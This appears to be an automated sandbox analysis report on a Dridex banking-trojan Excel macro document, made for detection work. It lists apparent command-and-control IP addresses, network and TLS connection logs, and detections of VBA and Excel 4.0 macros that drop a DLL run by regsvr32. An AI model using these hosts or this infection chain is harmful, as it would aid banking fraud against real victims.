Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: www5.ritamartins.pt
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2237170577.0000000000174000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2388405613.00000000023D0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241751629.00000000040C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2387778399.0000000001D40000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2388107432.0000000001F00000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2237799499.0000000002320000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2388405613.00000000023D0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241751629.00000000040C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/k
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/u
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/N
Source: regsvr32.exe, 00000004.00000002.2387949260.00000000008AF000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2387949260.00000000008AF000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/4V
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/Bf
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/Kf
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/K
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/x
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49346
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49342
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49342 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49338
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49330
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49326
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49322
Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49398
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49394
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49390
Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49306
Source: unknownNetwork traffic detected: HTTP traffic on port 49326 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49386
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49382
Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49378 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49378
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49374
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49370
Source: unknownNetwork traffic detected: HTTP traffic on port 49358 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49362
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49382 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49358
Source: unknownNetwork traffic detected: HTTP traffic on port 49398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49354
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 443
Source: unknownHTTPS traffic detected: 185.2.4.104:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49180 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49196 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49204 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.168.2.22:49310 -> 77.220.64.37:443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2

E-Banking Fraud:

barindex
Detected Dridex e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\jczxic.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C22A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DBE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BB770 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BBA14 NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B5150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D1020
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CD030
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CE0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DDCA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D50A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D4CA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D5CB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C88C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C8CC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C98DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002BACD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CA0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C7564
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B1570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002BF9A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CD980
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DD180
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CC590
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D89F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D71F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CFDD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D0220
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DD620
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002BCA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CA660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D7660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D2E60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D1240
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C8AB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D1EB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D26B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CAE80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CF6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CB6F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C8EF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D62F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D3EC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B6AD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C96D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D1730
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D3B00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D9B10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C5B60
